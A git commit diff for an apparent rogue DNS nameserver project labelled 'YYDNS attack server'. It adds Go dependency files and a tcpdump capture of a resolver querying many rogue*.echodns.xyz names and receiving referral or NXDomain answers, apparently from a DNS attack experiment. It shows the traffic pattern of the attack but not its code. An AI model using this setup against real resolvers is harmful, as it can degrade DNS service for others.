YYDNS attack server

2024-06-03 19:20:05 +08:00
commit c96a23cc25
5 changed files with 282 additions and 0 deletions
--- a/go.mod
+++ b/go.mod
@@ -0,0 +1,12 @@
+module rogue_ns
+
+go 1.20
+
+require github.com/miekg/dns v1.1.56
+
+require (
+	golang.org/x/mod v0.12.0 // indirect
+	golang.org/x/net v0.15.0 // indirect
+	golang.org/x/sys v0.12.0 // indirect
+	golang.org/x/tools v0.13.0 // indirect
+)
--- a/go.sum
+++ b/go.sum
@@ -0,0 +1,11 @@
+github.com/miekg/dns v1.1.56 h1:5imZaSeoRNvpM9SzWNhEcP9QliKiz20/dA2QabIGVnE=
+github.com/miekg/dns v1.1.56/go.mod h1:cRm6Oo2C8TY9ZS/TqsSrseAcncm74lfK5G+ikN2SWWY=
+golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc=
+golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
+golang.org/x/net v0.15.0 h1:ugBLEUaxABaB5AJqW9enI0ACdci2RUd4eP51NTBvuJ8=
+golang.org/x/net v0.15.0/go.mod h1:idbUs1IY1+zTqbi8yxTbhexhEEk5ur9LInksu6HrEpk=
+golang.org/x/sync v0.3.0 h1:ftCYgMx6zT/asHUrPw8BLLscYtGznsLAnjq5RH9P66E=
+golang.org/x/sys v0.12.0 h1:CM0HF96J0hcLAwsHPJZjfdNzs0gftsLfgKt57wWHJ0o=
+golang.org/x/sys v0.12.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ=
+golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58=
--- a/195
+++ b/195
@@ -0,0 +1,195 @@
+17:38:22.483192 IP iZ2ze11fv3gfx9tcsh4cdzZ.54805 > 159.75.200.247.domain: 59774 A? rogue.echodns.xyz. (35)
+17:38:22.527030 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.54805: 59774*- 0/5/0 (140)
+17:38:22.527528 IP iZ2ze11fv3gfx9tcsh4cdzZ.41403 > 159.75.200.247.domain: 1147 A? rogue0.echodns.xyz. (36)
+17:38:22.527597 IP iZ2ze11fv3gfx9tcsh4cdzZ.53486 > 159.75.200.247.domain: 5951 AAAA? rogue0.echodns.xyz. (36)
+17:38:22.527618 IP iZ2ze11fv3gfx9tcsh4cdzZ.60467 > 159.75.200.247.domain: 25551 A? rogue1.echodns.xyz. (36)
+17:38:22.527650 IP iZ2ze11fv3gfx9tcsh4cdzZ.37547 > 159.75.200.247.domain: 51470 A? rogue2.echodns.xyz. (36)
+17:38:22.527722 IP iZ2ze11fv3gfx9tcsh4cdzZ.50243 > 159.75.200.247.domain: 19546 AAAA? rogue2.echodns.xyz. (36)
+17:38:22.527725 IP iZ2ze11fv3gfx9tcsh4cdzZ.53764 > 159.75.200.247.domain: 48733 AAAA? rogue1.echodns.xyz. (36)
+17:38:22.527769 IP iZ2ze11fv3gfx9tcsh4cdzZ.41615 > 159.75.200.247.domain: 55276 A? rogue3.echodns.xyz. (36)
+17:38:22.527815 IP iZ2ze11fv3gfx9tcsh4cdzZ.42434 > 159.75.200.247.domain: 29971 A? rogue4.echodns.xyz. (36)
+17:38:22.527819 IP iZ2ze11fv3gfx9tcsh4cdzZ.39509 > 159.75.200.247.domain: 61434 AAAA? rogue3.echodns.xyz. (36)
+17:38:22.527875 IP iZ2ze11fv3gfx9tcsh4cdzZ.45085 > 159.75.200.247.domain: 6969 AAAA? rogue4.echodns.xyz. (36)
+17:38:22.577725 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.37547: 51470*- 0/5/0 (146)
+17:38:22.577764 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.39509: 61434 NXDomain*- 0/0/0 (36)
+17:38:22.577769 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.41615: 55276*- 0/5/0 (146)
+17:38:22.577773 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.60467: 25551*- 0/5/0 (146)
+17:38:22.577776 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.45085: 6969 NXDomain*- 0/0/0 (36)
+17:38:22.577781 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.42434: 29971*- 0/5/0 (146)
+17:38:22.577784 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.41403: 1147*- 0/5/0 (146)
+17:38:22.577788 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.53486: 5951 NXDomain*- 0/0/0 (36)
+17:38:22.577791 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.50243: 19546 NXDomain*- 0/0/0 (36)
+17:38:22.578439 IP iZ2ze11fv3gfx9tcsh4cdzZ.53343 > 159.75.200.247.domain: 21020 A? rogue22.echodns.xyz. (37)
+17:38:22.578502 IP iZ2ze11fv3gfx9tcsh4cdzZ.34707 > 159.75.200.247.domain: 5312 AAAA? rogue22.echodns.xyz. (37)
+17:38:22.579024 IP iZ2ze11fv3gfx9tcsh4cdzZ.57414 > 159.75.200.247.domain: 55170 A? rogue32.echodns.xyz. (37)
+17:38:22.579097 IP iZ2ze11fv3gfx9tcsh4cdzZ.60249 > 159.75.200.247.domain: 55912 AAAA? rogue32.echodns.xyz. (37)
+17:38:22.579167 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.53764: 48733 NXDomain*- 0/0/0 (36)
+17:38:22.579420 IP iZ2ze11fv3gfx9tcsh4cdzZ.42492 > 159.75.200.247.domain: 13375 A? rogue20.echodns.xyz. (37)
+17:38:22.579460 IP iZ2ze11fv3gfx9tcsh4cdzZ.37652 > 159.75.200.247.domain: 46649 AAAA? rogue20.echodns.xyz. (37)
+17:38:22.579497 IP iZ2ze11fv3gfx9tcsh4cdzZ.57239 > 159.75.200.247.domain: 52174 A? rogue21.echodns.xyz. (37)
+17:38:22.579531 IP iZ2ze11fv3gfx9tcsh4cdzZ.49582 > 159.75.200.247.domain: 64473 AAAA? rogue21.echodns.xyz. (37)
+17:38:22.579568 IP iZ2ze11fv3gfx9tcsh4cdzZ.35084 > 159.75.200.247.domain: 6978 A? rogue30.echodns.xyz. (37)
+17:38:22.579605 IP iZ2ze11fv3gfx9tcsh4cdzZ.54173 > 159.75.200.247.domain: 63535 AAAA? rogue30.echodns.xyz. (37)
+17:38:22.579665 IP iZ2ze11fv3gfx9tcsh4cdzZ.35816 > 159.75.200.247.domain: 12638 A? rogue31.echodns.xyz. (37)
+17:38:22.579704 IP iZ2ze11fv3gfx9tcsh4cdzZ.48975 > 159.75.200.247.domain: 50923 AAAA? rogue31.echodns.xyz. (37)
+17:38:22.579747 IP iZ2ze11fv3gfx9tcsh4cdzZ.55045 > 159.75.200.247.domain: 34278 A? rogue34.echodns.xyz. (37)
+17:38:22.579784 IP iZ2ze11fv3gfx9tcsh4cdzZ.34390 > 159.75.200.247.domain: 11670 A? rogue33.echodns.xyz. (37)
+17:38:22.579794 IP iZ2ze11fv3gfx9tcsh4cdzZ.50225 > 159.75.200.247.domain: 19286 AAAA? rogue34.echodns.xyz. (37)
+17:38:22.579829 IP iZ2ze11fv3gfx9tcsh4cdzZ.44454 > 159.75.200.247.domain: 12493 A? rogue23.echodns.xyz. (37)
+17:38:22.579853 IP iZ2ze11fv3gfx9tcsh4cdzZ.36893 > 159.75.200.247.domain: 58297 AAAA? rogue33.echodns.xyz. (37)
+17:38:22.579872 IP iZ2ze11fv3gfx9tcsh4cdzZ.50618 > 159.75.200.247.domain: 23276 AAAA? rogue23.echodns.xyz. (37)
+17:38:22.579911 IP iZ2ze11fv3gfx9tcsh4cdzZ.40396 > 159.75.200.247.domain: 33831 A? rogue24.echodns.xyz. (37)
+17:38:22.579946 IP iZ2ze11fv3gfx9tcsh4cdzZ.46677 > 159.75.200.247.domain: 30043 A? rogue10.echodns.xyz. (37)
+17:38:22.579991 IP iZ2ze11fv3gfx9tcsh4cdzZ.55708 > 159.75.200.247.domain: 2356 AAAA? rogue10.echodns.xyz. (37)
+17:38:22.580037 IP iZ2ze11fv3gfx9tcsh4cdzZ.38599 > 159.75.200.247.domain: 50589 AAAA? rogue24.echodns.xyz. (37)
+17:38:22.580118 IP iZ2ze11fv3gfx9tcsh4cdzZ.40518 > 159.75.200.247.domain: 5335 A? rogue12.echodns.xyz. (37)
+17:38:22.580137 IP iZ2ze11fv3gfx9tcsh4cdzZ.59168 > 159.75.200.247.domain: 43177 A? rogue11.echodns.xyz. (37)
+17:38:22.580207 IP iZ2ze11fv3gfx9tcsh4cdzZ.56403 > 159.75.200.247.domain: 25117 AAAA? rogue12.echodns.xyz. (37)
+17:38:22.580234 IP iZ2ze11fv3gfx9tcsh4cdzZ.44586 > 159.75.200.247.domain: 8580 AAAA? rogue11.echodns.xyz. (37)
+17:38:22.580262 IP iZ2ze11fv3gfx9tcsh4cdzZ.58092 > 159.75.200.247.domain: 38944 A? rogue13.echodns.xyz. (37)
+17:38:22.580286 IP iZ2ze11fv3gfx9tcsh4cdzZ.42250 > 159.75.200.247.domain: 29225 A? rogue14.echodns.xyz. (37)
+17:38:22.580312 IP iZ2ze11fv3gfx9tcsh4cdzZ.48641 > 159.75.200.247.domain: 25112 AAAA? rogue13.echodns.xyz. (37)
+17:38:22.580329 IP iZ2ze11fv3gfx9tcsh4cdzZ.54935 > 159.75.200.247.domain: 44605 AAAA? rogue14.echodns.xyz. (37)
+17:38:22.580368 IP iZ2ze11fv3gfx9tcsh4cdzZ.55140 > 159.75.200.247.domain: 2045 A? rogue40.echodns.xyz. (37)
+17:38:22.580371 IP iZ2ze11fv3gfx9tcsh4cdzZ.45445 > 159.75.200.247.domain: 25489 A? rogue41.echodns.xyz. (37)
+17:38:22.580426 IP iZ2ze11fv3gfx9tcsh4cdzZ.43201 > 159.75.200.247.domain: 49812 AAAA? rogue40.echodns.xyz. (37)
+17:38:22.580584 IP iZ2ze11fv3gfx9tcsh4cdzZ.54533 > 159.75.200.247.domain: 52241 AAAA? rogue43.echodns.xyz. (37)
+17:38:22.580625 IP iZ2ze11fv3gfx9tcsh4cdzZ.57087 > 159.75.200.247.domain: 38085 A? rogue00.echodns.xyz. (37)
+17:38:22.580674 IP iZ2ze11fv3gfx9tcsh4cdzZ.54755 > 159.75.200.247.domain: 15965 AAAA? rogue00.echodns.xyz. (37)
+17:38:22.580710 IP iZ2ze11fv3gfx9tcsh4cdzZ.58598 > 159.75.200.247.domain: 63293 A? rogue44.echodns.xyz. (37)
+17:38:22.580745 IP iZ2ze11fv3gfx9tcsh4cdzZ.52444 > 159.75.200.247.domain: 10764 AAAA? rogue44.echodns.xyz. (37)
+17:38:22.580812 IP iZ2ze11fv3gfx9tcsh4cdzZ.53566 > 159.75.200.247.domain: 64939 A? rogue01.echodns.xyz. (37)
+17:38:22.580864 IP iZ2ze11fv3gfx9tcsh4cdzZ.41399 > 159.75.200.247.domain: 12019 AAAA? rogue01.echodns.xyz. (37)
+17:38:22.580966 IP iZ2ze11fv3gfx9tcsh4cdzZ.42503 > 159.75.200.247.domain: 37177 AAAA? rogue41.echodns.xyz. (37)
+17:38:22.581030 IP iZ2ze11fv3gfx9tcsh4cdzZ.41415 > 159.75.200.247.domain: 10377 A? rogue03.echodns.xyz. (37)
+17:38:22.581033 IP iZ2ze11fv3gfx9tcsh4cdzZ.38577 > 159.75.200.247.domain: 20467 A? rogue02.echodns.xyz. (37)
+17:38:22.581076 IP iZ2ze11fv3gfx9tcsh4cdzZ.36425 > 159.75.200.247.domain: 17851 AAAA? rogue03.echodns.xyz. (37)
+17:38:22.581120 IP iZ2ze11fv3gfx9tcsh4cdzZ.39749 > 159.75.200.247.domain: 51812 A? rogue04.echodns.xyz. (37)
+17:38:22.581224 IP iZ2ze11fv3gfx9tcsh4cdzZ.56279 > 159.75.200.247.domain: 37389 AAAA? rogue02.echodns.xyz. (37)
+17:38:22.581245 IP iZ2ze11fv3gfx9tcsh4cdzZ.56141 > 159.75.200.247.domain: 20411 AAAA? rogue04.echodns.xyz. (37)
+17:38:22.620677 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.48975: 50923 NXDomain*- 0/0/0 (37)
+17:38:22.621072 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.36079: 2886 NXDomain*- 0/0/0 (37)
+17:38:22.621303 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.55708: 2356 NXDomain*- 0/0/0 (37)
+17:38:22.621553 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.57414: 55170*- 0/5/0 (152)
+17:38:22.621562 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.57087: 38085*- 0/5/0 (152)
+17:38:22.621803 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.56279: 37389 NXDomain*- 0/0/0 (37)
+17:38:22.622065 IP iZ2ze11fv3gfx9tcsh4cdzZ.40221 > 159.75.200.247.domain: 47634 A? rogue320.echodns.xyz. (38)
+17:38:22.622120 IP iZ2ze11fv3gfx9tcsh4cdzZ.51850 > 159.75.200.247.domain: 17784 AAAA? rogue320.echodns.xyz. (38)
+17:38:22.622211 IP iZ2ze11fv3gfx9tcsh4cdzZ.33904 > 159.75.200.247.domain: 52498 A? rogue000.echodns.xyz. (38)
+17:38:22.622256 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.35816: 12638*- 0/5/0 (152)
+17:38:22.622259 IP iZ2ze11fv3gfx9tcsh4cdzZ.43338 > 159.75.200.247.domain: 52598 AAAA? rogue000.echodns.xyz. (38)
+17:38:22.622288 IP iZ2ze11fv3gfx9tcsh4cdzZ.46565 > 159.75.200.247.domain: 2416 A? rogue001.echodns.xyz. (38)
+17:38:22.622313 IP iZ2ze11fv3gfx9tcsh4cdzZ.60638 > 159.75.200.247.domain: 9213 A? rogue321.echodns.xyz. (38)
+17:38:22.622344 IP iZ2ze11fv3gfx9tcsh4cdzZ.45400 > 159.75.200.247.domain: 21085 AAAA? rogue001.echodns.xyz. (38)
+17:38:22.622366 IP iZ2ze11fv3gfx9tcsh4cdzZ.39836 > 159.75.200.247.domain: 35373 AAAA? rogue321.echodns.xyz. (38)
+17:38:22.622387 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.54533: 52241 NXDomain*- 0/0/0 (37)
+17:38:22.622403 IP iZ2ze11fv3gfx9tcsh4cdzZ.41244 > 159.75.200.247.domain: 5220 A? rogue322.echodns.xyz. (38)
+17:38:22.622414 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.37652: 46649 NXDomain*- 0/0/0 (37)
+17:38:22.622415 IP iZ2ze11fv3gfx9tcsh4cdzZ.41194 > 159.75.200.247.domain: 58578 A? rogue002.echodns.xyz. (38)
+17:38:22.622420 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.38577: 20467*- 0/5/0 (152)
+17:38:22.622470 IP iZ2ze11fv3gfx9tcsh4cdzZ.52933 > 159.75.200.247.domain: 19593 AAAA? rogue322.echodns.xyz. (38)
+17:38:22.622526 IP iZ2ze11fv3gfx9tcsh4cdzZ.45938 > 159.75.200.247.domain: 46464 A? rogue323.echodns.xyz. (38)
+17:38:22.622558 IP iZ2ze11fv3gfx9tcsh4cdzZ.38395 > 159.75.200.247.domain: 61397 AAAA? rogue323.echodns.xyz. (38)
+17:38:22.622591 IP iZ2ze11fv3gfx9tcsh4cdzZ.46608 > 159.75.200.247.domain: 13573 A? rogue324.echodns.xyz. (38)
+17:38:22.622626 IP iZ2ze11fv3gfx9tcsh4cdzZ.47229 > 159.75.200.247.domain: 13361 AAAA? rogue324.echodns.xyz. (38)
+17:38:22.622633 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.60249: 55912 NXDomain*- 0/0/0 (37)
+17:38:22.622660 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.44454: 12493*- 0/5/0 (152)
+17:38:22.622871 IP iZ2ze11fv3gfx9tcsh4cdzZ.48008 > 159.75.200.247.domain: 858 AAAA? rogue002.echodns.xyz. (38)
+17:38:22.622919 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.34707: 5312 NXDomain*- 0/0/0 (37)
+17:38:22.622939 IP iZ2ze11fv3gfx9tcsh4cdzZ.37317 > 159.75.200.247.domain: 62967 A? rogue004.echodns.xyz. (38)
+17:38:22.622949 IP iZ2ze11fv3gfx9tcsh4cdzZ.37530 > 159.75.200.247.domain: 56319 A? rogue003.echodns.xyz. (38)
+17:38:22.622986 IP iZ2ze11fv3gfx9tcsh4cdzZ.51778 > 159.75.200.247.domain: 6745 AAAA? rogue004.echodns.xyz. (38)
+17:38:22.623012 IP iZ2ze11fv3gfx9tcsh4cdzZ.38240 > 159.75.200.247.domain: 43190 AAAA? rogue003.echodns.xyz. (38)
+17:38:22.623054 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.43201: 49812 NXDomain*- 0/0/0 (37)
+17:38:22.623363 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.34390: 11670*- 0/5/0 (152)
+17:38:22.623483 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.40396: 33831*- 0/5/0 (152)
+17:38:22.623530 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.59168: 43177*- 0/5/0 (152)
+17:38:22.623538 IP iZ2ze11fv3gfx9tcsh4cdzZ.39731 > 159.75.200.247.domain: 28626 A? rogue313.echodns.xyz. (38)
+17:38:22.623733 IP iZ2ze11fv3gfx9tcsh4cdzZ.55984 > 159.75.200.247.domain: 10220 A? rogue021.echodns.xyz. (38)
+17:38:22.623740 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.56141: 20411 NXDomain*- 0/0/0 (37)
+17:38:22.623751 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.39749: 51812*- 0/5/0 (152)
+17:38:22.623783 IP iZ2ze11fv3gfx9tcsh4cdzZ.39806 > 159.75.200.247.domain: 50735 AAAA? rogue021.echodns.xyz. (38)
+17:38:22.623828 IP iZ2ze11fv3gfx9tcsh4cdzZ.49086 > 159.75.200.247.domain: 15933 AAAA? rogue313.echodns.xyz. (38)
+17:38:22.623834 IP iZ2ze11fv3gfx9tcsh4cdzZ.60366 > 159.75.200.247.domain: 42163 A? rogue020.echodns.xyz. (38)
+17:38:22.623938 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.42492: 13375*- 0/5/0 (152)
+17:38:22.623977 IP iZ2ze11fv3gfx9tcsh4cdzZ.43022 > 159.75.200.247.domain: 60592 A? rogue310.echodns.xyz. (38)
+17:38:22.623982 IP iZ2ze11fv3gfx9tcsh4cdzZ.53923 > 159.75.200.247.domain: 31379 AAAA? rogue020.echodns.xyz. (38)
+17:38:22.624045 IP iZ2ze11fv3gfx9tcsh4cdzZ.44051 > 159.75.200.247.domain: 14704 AAAA? rogue310.echodns.xyz. (38)
+17:38:22.624048 IP iZ2ze11fv3gfx9tcsh4cdzZ.36274 > 159.75.200.247.domain: 55028 A? rogue311.echodns.xyz. (38)
+17:38:22.624107 IP iZ2ze11fv3gfx9tcsh4cdzZ.59129 > 159.75.200.247.domain: 18063 A? rogue312.echodns.xyz. (38)
+17:38:22.624175 IP iZ2ze11fv3gfx9tcsh4cdzZ.33007 > 159.75.200.247.domain: 12839 AAAA? rogue312.echodns.xyz. (38)
+17:38:22.624225 IP iZ2ze11fv3gfx9tcsh4cdzZ.59482 > 159.75.200.247.domain: 57483 A? rogue022.echodns.xyz. (38)
+17:38:22.624238 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.55045: 34278*- 0/5/0 (152)
+17:38:22.624270 IP iZ2ze11fv3gfx9tcsh4cdzZ.38580 > 159.75.200.247.domain: 36995 AAAA? rogue022.echodns.xyz. (38)
+17:38:22.624382 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.53566: 64939*- 0/5/0 (152)
+17:38:22.624396 IP iZ2ze11fv3gfx9tcsh4cdzZ.60752 > 159.75.200.247.domain: 3623 AAAA? rogue311.echodns.xyz. (38)
+17:38:22.624423 IP iZ2ze11fv3gfx9tcsh4cdzZ.49624 > 159.75.200.247.domain: 7964 A? rogue023.echodns.xyz. (38)
+17:38:22.624458 IP iZ2ze11fv3gfx9tcsh4cdzZ.50276 > 159.75.200.247.domain: 35696 A? rogue024.echodns.xyz. (38)
+17:38:22.624474 IP iZ2ze11fv3gfx9tcsh4cdzZ.59696 > 159.75.200.247.domain: 6103 AAAA? rogue023.echodns.xyz. (38)
+17:38:22.624498 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.49582: 64473 NXDomain*- 0/0/0 (37)
+17:38:22.624511 IP iZ2ze11fv3gfx9tcsh4cdzZ.53973 > 159.75.200.247.domain: 15928 AAAA? rogue024.echodns.xyz. (38)
+17:38:22.625103 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.42503: 37177 NXDomain*- 0/0/0 (37)
+17:38:22.625173 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.40518: 5335*- 0/5/0 (152)
+17:38:22.625281 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.50618: 23276 NXDomain*- 0/0/0 (37)
+17:38:22.625680 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.41399: 12019 NXDomain*- 0/0/0 (37)
+17:38:22.625828 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.58598: 63293*- 0/5/0 (152)
+17:38:22.625835 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.36893: 58297 NXDomain*- 0/0/0 (37)
+17:38:22.625921 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.36425: 17851 NXDomain*- 0/0/0 (37)
+17:38:22.626027 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.53343: 21020*- 0/5/0 (152)
+17:38:22.626174 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.41415: 10377*- 0/5/0 (152)
+17:38:22.626356 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.57239: 52174*- 0/5/0 (152)
+17:38:22.626412 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.40716: 54976*- 0/5/0 (152)
+17:38:22.626540 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.42250: 29225*- 0/5/0 (152)
+17:38:22.626700 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.50225: 19286 NXDomain*- 0/0/0 (37)
+17:38:22.626726 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.45445: 25489*- 0/5/0 (152)
+17:38:22.627259 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.48641: 25112 NXDomain*- 0/0/0 (37)
+17:38:22.627508 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.38599: 50589 NXDomain*- 0/0/0 (37)
+17:38:22.627520 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.46677: 30043*- 0/5/0 (152)
+17:38:22.627893 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.35084: 6978*- 0/5/0 (152)
+17:38:22.628113 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.56403: 25117 NXDomain*- 0/0/0 (37)
+17:38:22.628387 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.58092: 38944*- 0/5/0 (152)
+17:38:22.629558 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.55140: 2045*- 0/5/0 (152)
+17:38:22.629604 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.44586: 8580 NXDomain*- 0/0/0 (37)
+17:38:22.629789 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.54755: 15965 NXDomain*- 0/0/0 (37)
+17:38:22.629923 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.60936: 36602*- 0/5/0 (152)
+17:38:22.629939 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.54173: 63535 NXDomain*- 0/0/0 (37)
+17:38:22.630520 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.54935: 44605 NXDomain*- 0/0/0 (37)
+17:38:22.630884 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.52444: 10764 NXDomain*- 0/0/0 (37)
+17:38:22.662779 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.51850: 17784 NXDomain*- 0/0/0 (38)
+17:38:22.663683 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.60638: 9213*- 0/5/0 (158)
+17:38:22.663732 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.44051: 14704 NXDomain*- 0/0/0 (38)
+17:38:22.664045 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.41244: 5220*- 0/5/0 (158)
+17:38:22.664251 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.51778: 6745 NXDomain*- 0/0/0 (38)
+17:38:22.664341 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.46608: 13573*- 0/5/0 (158)
+17:38:22.664939 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.37530: 56319*- 0/5/0 (158)
+17:38:22.665194 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.59482: 57483*- 0/5/0 (158)
+17:38:22.666064 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.47229: 13361 NXDomain*- 0/0/0 (38)
+17:38:22.666206 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.52933: 19593 NXDomain*- 0/0/0 (38)
+17:38:22.666236 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.48008: 858 NXDomain*- 0/0/0 (38)
+17:38:22.666689 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.38580: 36995 NXDomain*- 0/0/0 (38)
+17:38:22.666924 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.38240: 43190 NXDomain*- 0/0/0 (38)
+17:38:22.667033 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.45938: 46464*- 0/5/0 (158)
+17:38:22.667064 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.50276: 35696*- 0/5/0 (158)
+17:38:22.667108 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.37317: 62967*- 0/5/0 (158)
+17:38:22.667126 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.33904: 52498*- 0/5/0 (158)
+17:38:22.667130 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.38395: 61397 NXDomain*- 0/0/0 (38)
+17:38:22.667346 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.40221: 47634*- 0/5/0 (158)
+17:38:22.667669 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.60366: 42163*- 0/5/0 (158)
+17:38:22.667906 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.33007: 12839 NXDomain*- 0/0/0 (38)
+17:38:22.668123 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.46565: 2416*- 0/5/0 (158)
+17:38:22.668233 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.59129: 18063*- 0/5/0 (158)
+17:38:22.668456 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.36274: 55028*- 0/5/0 (158)
+17:38:22.669008 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.43338: 52598 NXDomain*- 0/0/0 (38)
+17:38:22.670302 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.49624: 7964*- 0/5/0 (158)
+17:38:22.670955 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.55984: 10220*- 0/5/0 (158)
+17:38:22.671359 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.53973: 15928 NXDomain*- 0/0/0 (38)
+17:38:22.671919 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.45400: 21085 NXDomain*- 0/0/0 (38)
+17:38:22.672244 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.41194: 58578*- 0/5/0 (158)
+17:38:22.672380 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.39806: 50735 NXDomain*- 0/0/0 (38)
